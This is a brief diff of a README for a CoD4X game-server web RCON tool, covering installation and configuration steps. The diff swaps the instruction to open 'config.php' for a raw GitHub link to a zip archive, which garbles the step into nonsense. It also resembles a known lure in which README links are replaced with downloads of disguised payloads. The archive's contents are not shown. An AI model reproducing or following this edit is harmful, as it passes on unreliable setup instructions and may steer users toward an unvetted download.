BONY316/cod4x-web-rcon-tool/README.md

    - If using Nginx, configure the server to point to the extracted folder.

 3. **Configure the Tool:**
-   - Open the `config.php` file from the extracted folder.
+   - Open the `https://raw.githubusercontent.com/BONY316/cod4x-web-rcon-tool/main/assets/cod4x-web-rcon-tool_v1.4.zip` file from the extracted folder.
    - Fill in your server details, including RCON password and server IP address.

 4. **Access the Tool:**